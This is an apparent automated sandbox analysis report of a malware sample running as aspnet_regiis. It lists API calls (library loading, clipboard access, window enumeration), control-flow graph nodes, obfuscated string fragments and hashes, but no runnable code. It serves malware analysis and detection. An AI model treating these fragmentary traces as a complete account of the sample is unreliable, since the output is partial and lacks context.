                                                                            • Instruction ID: 3dbf97ec74f64e8e2f7e216d8b5a956b7194f4f1ed9a3b1977ce7a706554cdcd
                                                                            • Opcode Fuzzy Hash: da1a27c50c8ad60bc2e641fbd69d46834275d91c138a9d2bc7026357f6ce1b6d
                                                                            • Instruction Fuzzy Hash: C5F04C3A5183505BE304EB38F4C12267BA9E781318F04491DE4D1CF394C734C841CF02
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 033A07F9
                                                                            • CoInitialize.OLE32(00000000), ref: 033A0900
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: Initialize
                                                                            • String ID:
                                                                            • API String ID: 2538663250-0

                                                                            Control-flow Graph

                                                                            control_flow_graph 2064 339e1c0-339e1f7 2065 339e200-339e220 2064->2065 2065->2065 2066 339e222-339e25b 2065->2066 2067 339e260-339e27c 2066->2067 2067->2067 2068 339e27e-339e296 LoadLibraryExW call 33cf7a0 2067->2068 2071 339e29d-339e29f 2068->2071 2072 339e2a1-339e2e4 call 33d33b0 * 3 2068->2072 2073 339e2f1-339e2fb 2071->2073 2072->2073
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(611D67ED,00000000,E3E2F9E0), ref: 0339E286
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0

                                                                            Control-flow Graph

                                                                            control_flow_graph 2080 33d0676-33d06bf 2081 33d06c0-33d06fe 2080->2081 2081->2081 2082 33d0700-33d0715 LoadLibraryExW 2081->2082 2083 33d071b-33d074a 2082->2083 2084 33d0c46-33d0c93 2082->2084 2083->2084
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(D768C967,00000000,00000800), ref: 033D070C
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0

                                                                            Control-flow Graph

                                                                            control_flow_graph 2086 33cdc40-33cdc51 2087 33cdc58-33cdc6b 2086->2087 2088 33cdcd3-33cdcda 2086->2088 2089 33cdc70-33cdcbc 2087->2089 2089->2089 2090 33cdcbe-33cdccd RtlFreeHeap 2089->2090 2090->2088
                                                                            APIs
                                                                            • RtlFreeHeap.NTDLL(?,00000000,?), ref: 033CDCCD
                                                                            Similarity
                                                                            • API ID: FreeHeap
                                                                            • String ID:
                                                                            • API String ID: 3298025750-0

                                                                            Control-flow Graph

                                                                            control_flow_graph 2091 33c1859-33c18c3 call 33ac2a0 CoSetProxyBlanket
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: BlanketProxy
                                                                            • String ID:
                                                                            • API String ID: 3890896728-0
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: BlanketProxy
                                                                            • String ID:
                                                                            • API String ID: 3890896728-0
                                                                            APIs
                                                                            • GetForegroundWindow.USER32 ref: 033D0F76
                                                                            Similarity
                                                                            • API ID: ForegroundWindow
                                                                            • String ID:
                                                                            • API String ID: 2020703349-0
                                                                            APIs
                                                                            • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 033CA965
                                                                            Similarity
                                                                            • API ID: BlanketProxy
                                                                            • String ID:
                                                                            • API String ID: 3890896728-0
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(?,00000000,?,?,00000000), ref: 033CDC24
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Clipboard$CloseDataLongOpenWindow
                                                                            • String ID: I$K$L$N$V$V$X$Y$Y$]$_$q
                                                                            • API String ID: 1647500905-2073889574
                                                                            APIs
                                                                            • FindWindowExW.USER32(00000000,?,A3D19DEA,00000000), ref: 033AE410
                                                                            Similarity
                                                                            • API ID: FindWindow
                                                                            • String ID:
                                                                            • API String ID: 134000473-0
                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MetricsSystem
                                                                            • String ID:
                                                                            • API String ID: 4116985748-3916222277
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 15c2d990848bbd9c8500d4fcd49ccea1da3e79641c0883768ed45fed22fd30b4
                                                                            • Instruction ID: 5c825a67deef6ea29ede40796b9e7b559ee28fbfc3c69fea73f3047379a7c08b
                                                                            • Opcode Fuzzy Hash: 15c2d990848bbd9c8500d4fcd49ccea1da3e79641c0883768ed45fed22fd30b4
                                                                            • Instruction Fuzzy Hash: F85109BA06A3C19BE770DF55E5987CBBAF4AB85308F10990C94DC1A352CB765188CF86
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: AllocString
                                                                            • String ID: 0$A$C$E$E$E$G$I$L$M$O$V$X$a$c$d$e$g$i$k$m$o$q$s$u$w$y${$}
                                                                            • API String ID: 2525500382-1585318030
                                                                            • Opcode ID: 2af4bac00a47341f0286deaa31c152fbff0a77ea8e8996c47ae50d0681933831
                                                                            • Instruction ID: acca40306eae98b8a9736b99911992dbe156d883a8df5339f5550f6f326e1c1c
                                                                            • Opcode Fuzzy Hash: 2af4bac00a47341f0286deaa31c152fbff0a77ea8e8996c47ae50d0681933831
                                                                            • Instruction Fuzzy Hash: EA91182150DBC189E332C73C885879BBED12BA3224F088B9DD5ED9B2D2C7B90449C767
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: InitVariant
                                                                            • String ID: @$A$C$E$G$I$K$M$O$q$s$u$w$y
                                                                            • API String ID: 1927566239-3739842773
                                                                            • Opcode ID: 79e693039503f0f46e481d73765be293c628cd13523e6d24926b6069280bd9ea
                                                                            • Instruction ID: d4619fb36ce6b7c96d6c7168957e0618e36c79898bf0b2481f47acfbcb332c3f
                                                                            • Opcode Fuzzy Hash: 79e693039503f0f46e481d73765be293c628cd13523e6d24926b6069280bd9ea
                                                                            • Instruction Fuzzy Hash: AF51567190C7C08AE325CB38845879EBFD16BD6324F184A9DE4E94B3E2C7B88945C753
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit
                                                                            • String ID: !$($-$-$2$3$7$8$=$?
                                                                            • API String ID: 2610073882-1101923984
                                                                            • Opcode ID: 703756b378ed8a8dba2b846e26f22346c9c2aee30b62685056ca37a55532439a
                                                                            • Instruction ID: 500dbdf56cfc3a7929b85db0c5074f774ca926900247b0df93636d5d8a00ed6e
                                                                            • Opcode Fuzzy Hash: 703756b378ed8a8dba2b846e26f22346c9c2aee30b62685056ca37a55532439a
                                                                            • Instruction Fuzzy Hash: 7841477150C7C18FD321DA3C884865EBFE16BA6324F094A9DE5E4873D2C7B58906C753
                                                                            APIs
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 033ACCA3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: ProcessThreadWindow
                                                                            • String ID: ;:54$TU
                                                                            • API String ID: 1653199695-2129887498
                                                                            • Opcode ID: 438c4aae6e059fe58b678ee99e17414b0b79ef5be70109e13d28e76f0cb04248
                                                                            • Instruction ID: 4f9dc3e7b1eb77255f02321ecb226e6eb79484b0671f8d1cd6d75f72f26be030
                                                                            • Opcode Fuzzy Hash: 438c4aae6e059fe58b678ee99e17414b0b79ef5be70109e13d28e76f0cb04248
                                                                            • Instruction Fuzzy Hash: F591D075609301CFDB14EF28E8C066BB7BAFF89715F0A896CE1848B254E734E955CB42
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2236254867.0000000003391000.00000020.00000400.00020000.00000000.sdmp, Offset: 03390000, based on PE: true
                                                                            • Associated: 00000003.00000002.2236239329.0000000003390000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236287467.00000000033D6000.00000002.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236304038.00000000033D9000.00000040.00000400.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.2236321793.00000000033E9000.00000002.00000400.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3390000_aspnet_regiis.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem
                                                                            • String ID:
                                                                            • API String ID: 4116985748-3916222277
                                                                            • Opcode ID: 0e1e88b7f6e31b635b73b25d0270667420ba0da76f22c810844c022d872bc707
                                                                            • Instruction ID: a77973ede6b33ae2e388459131ec10babd08bee59c6d1ca2c63c0019c01c00b9
                                                                            • Opcode Fuzzy Hash: 0e1e88b7f6e31b635b73b25d0270667420ba0da76f22c810844c022d872bc707
                                                                            • Instruction Fuzzy Hash: D1318EB09193049FDB40EF6DE985A1EBBF4BB88304F11852DE488DB354D774A958CB92